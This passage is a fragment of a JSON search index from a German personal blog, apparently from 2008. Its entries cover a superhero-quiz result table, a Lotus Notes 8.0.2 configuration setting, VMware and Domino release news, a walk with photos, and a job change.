\u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 70%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Hulk\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=65\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 65%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Robin\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=60\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 60%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Green Lantern\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=55\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 55%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Batman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=50\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 50%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Supergirl\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e The Flash\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Iron Man\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=45\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 45%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Wonder Woman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=35\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 35%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e Catwoman\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hr \u003cspan style=\"color:#268bd2\"\u003eALIGN\u003c/span\u003e=LEFT NOSHADE \u003cspan style=\"color:#268bd2\"\u003eSIZE\u003c/span\u003e=\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e4\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWIDTH\u003c/span\u003e=25\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e 25%\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/tr\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;/table\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e You are intelligent, witty, \u0026lt;br /\u0026gt;a bit geeky and have great\u0026lt;br /\u0026gt; power and responsibility.\u0026lt;br /\u0026gt; \u0026lt;img \u003cspan style=\"color:#268bd2\"\u003eSRC\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;http://www.thesuperheroquiz.com/pics/spidy.gif\u0026#34;\u003c/span\u003e /\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/td\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eClick here to take the “Which Superhero am I?” quiz…\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eVia \u003ca href=\"http://www.eknori.de\" target=\"_blank\"\u003eEknori \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-24-nearly-spiderman/","title":"Nearly Spiderman"},{"body":"Ein neuer Notes.ini Eintrag ist in 8.0.2 hinzugekommen, der steuern soll, welche Clientversion geöffnet wird. Also Notes 8 oder Notes 8 Basic. Vorteil ist, daß dann auch die richtige Clientart geöffnet wird, wenn man auf einen Mailto-Link klickt, oder ähnliches.\n[…]launch the Basic client based on a Notes.ini parameter UseBasicNotes=1. This notes.ini parameter will allow external programs that launch notes, such as a MailTo: URL, or launching an NSF file directly,[…]\nvia: vowe \u0026amp; Ed Brill ","excerpt":"\u003cp\u003eEin neuer Notes.ini Eintrag ist in 8.0.2 hinzugekommen, der steuern\nsoll, welche Clientversion geöffnet wird. Also Notes 8 oder Notes 8\nBasic. Vorteil ist, daß dann auch die richtige Clientart geöffnet wird,\nwenn man auf einen Mailto-Link klickt, oder ähnliches.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…]launch the Basic client based on a Notes.ini parameter\nUseBasicNotes=1. This notes.ini parameter will allow external programs\nthat launch notes, such as a MailTo: URL, or launching an NSF file\ndirectly,[…]\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003evia: \u003ca href=\"http://vowe.net/archives/009861.html\" target=\"_blank\"\u003evowe \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u0026amp;\n\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/usebasicnotes1\" target=\"_blank\"\u003eEd Brill \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-09-02-usebasicnotes/","title":"UseBasicNotes"},{"body":"Im Moment komme ich fast nicht dazu im Web zu surfen, geschweige denn einen Blogeintrag zu schreiben. Mir gehen aber doch mehrere coole und interessante Dinge durch den Kopf, die in näherer Zukunft hier im Blog beschrieben werden.\nWas gab es Neues diese Woche? Vmware Update Vmware Workstation 6 wurde aktualisiert. Die aktuelle Version ist auf der Webseite von Vmware seit 28.08.2008 verfügbar. Vmware Workstation ist im Moment die von mir am Meisten eingesetzte Software, da hier Testumgebungen schnell eingerichtet werden können. Der Snapshot-Mechanismus der Workstationversion ist absolut genial und über die Clonefunktion lassen sich schnell zusätzliche virtuelle Server erstellen.\nDomino 8.0.2 Lotus Domino 8.0.2 englisch verfügbar und laut Blogosphäre mit ziemlichen Performance-Gewinnen. Ich habe bisher nur einen Mailserver aktualisiert und einen Client getestet.\nAufgefallen ist mir, daß die neue Ultralite Ansicht des Webaccess nirgends genauer beschrieben wird. Wie wird sie aufgerufen, oder muß ausser einem Schablonenupdate etwas durchgeführt werden?\nDie Schablone des Webmail Redirect wurde aktualisiert und unter den Setup-Einstellungen gibt es jetzt einen Punkt “iphone, ipod”. Danach sollte die Ultraliteview funktionieren, eventuell muß der Safari Browsercache geleert werden.\nhttp://www-01.ibm.com/software/lotus/products/domino-web-access/ultralite/ http://www.heise.de/newsticker/Lotus-Notes-und-Domino-8-0-2-schneller-und-mit-iPhone-Unterstuetzung–/meldung/114888 Domino 8.5 Beta 2 Domino 8.5 Beta 2 ist ebenfalls erschienen und kann heruntergeladen werden. Die neuen Funktionen hören sich interessant an und ich hoffe ich komme im Lauf der Woche dazu sie zu testen, dann mehr dazu.\nhttp://www.pmooney.net/pmooney/pmooneynet.nsf/d6plinks/PMOY-7HUEHA [http://www.eknori.de/2008-08-30/notes-85-new-install-options/ ]3 ","excerpt":"\u003cp\u003eIm Moment komme ich fast nicht dazu im Web zu surfen, geschweige denn\neinen Blogeintrag zu schreiben. Mir gehen aber doch mehrere coole und\ninteressante Dinge durch den Kopf, die in näherer Zukunft hier im Blog\nbeschrieben werden.\u003c/p\u003e\n\u003ch1 id=\"was-gab-es-neues-diese-woche\"\u003eWas gab es Neues diese Woche? \u003ca href=\"#was-gab-es-neues-diese-woche\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"vmware-update\"\u003eVmware Update \u003ca href=\"#vmware-update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eVmware Workstation 6 wurde aktualisiert. Die aktuelle Version ist auf\nder Webseite von \u003ca href=\"http://www.vmware.com\" target=\"_blank\"\u003eVmware \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n seit 28.08.2008\nverfügbar. Vmware Workstation ist im Moment die von mir am Meisten\neingesetzte Software, da hier Testumgebungen schnell eingerichtet werden\nkönnen. Der Snapshot-Mechanismus der Workstationversion ist absolut\ngenial und über die Clonefunktion lassen sich schnell zusätzliche\nvirtuelle Server erstellen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-08-31-viel-zu-tun/","title":"Viel zu tun"},{"body":"Durch Paula bin ich jetzt oft zu Fuß mit dem Kinderwagen unterwegs und mit dabei ist entweder die Handy Kamera, oder die Digi-Cam.\nDer Holunder wird inzwischen reif und die Wärme am Sonntag war sehr entspannend.\nhttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg Eine der nervigsten Dinge in Prien, ist zumindest während der Sommersaison, die historische Chiemsee-Bahn. Diese Dampflok pfeift unentwegt und verdammt laut.\nNaja, aber sie gehört halt dazu und daher hier noch ein Bild:\nhttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg ","excerpt":"\u003cp\u003eDurch Paula bin ich jetzt oft zu Fuß mit dem Kinderwagen unterwegs und\nmit dabei ist entweder die Handy Kamera, oder die Digi-Cam.\u003c/p\u003e\n\u003cp\u003eDer Holunder wird inzwischen reif und die Wärme am Sonntag war sehr\nentspannend.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817holler.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eEine der nervigsten Dinge in Prien, ist zumindest während der\nSommersaison, die historische Chiemsee-Bahn. Diese Dampflok pfeift\nunentwegt und verdammt laut.\u003c/p\u003e\n\u003cp\u003eNaja, aber sie gehört halt dazu und daher hier noch ein Bild:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg\" target=\"_blank\"\u003ehttp://wp.stoeps.de/wp-content/uploads/2008/08/20080817chiemseebahn.jpg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-08-19-spaziergang/","title":"Spaziergang"},{"body":"In letzter Zeit war ich ja wieder etwas schreibfaul, aber das liegt daran, daß ich mich gerade aus meinem alten Job bei den Stadtwerken Rosenheim verabschiede und noch die eine oder andere Dokumentation zu meinen Servern und Skripten erstelle. Da habe ich abends meist keine Lust mehr noch zu schreiben.\nAb 1. August fange ich dann meine neue Arbeit bei Edcom an. Auf diese Tätigkeit freue ich mich ehrlich gesagt wahnsinnig! Nachdem meine dortige Arbeit wieder den Schwerpunkt Lotus Notes / Domino haben wird, werde ich mir den Typo3 -Relaunch des Blogs nochmal überlegen. In nächster Zeit bleibt hier erstmal alles beim Alten, nur am Design werd ich einige Anpassungen durchführen.\n","excerpt":"\u003cp\u003eIn letzter Zeit war ich ja wieder etwas schreibfaul, aber das liegt\ndaran, daß ich mich gerade aus meinem alten Job bei den\n\u003ca href=\"http://www.swro.de\" target=\"_blank\"\u003eStadtwerken Rosenheim \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n verabschiede und noch die eine\noder andere Dokumentation zu meinen Servern und Skripten erstelle. Da\nhabe ich abends meist keine Lust mehr noch zu schreiben.\u003c/p\u003e\n\u003cp\u003eAb 1. August fange ich dann meine neue Arbeit bei\n\u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eEdcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n an. Auf diese Tätigkeit freue ich mich\nehrlich gesagt wahnsinnig! Nachdem meine dortige Arbeit wieder den\nSchwerpunkt \u003ca 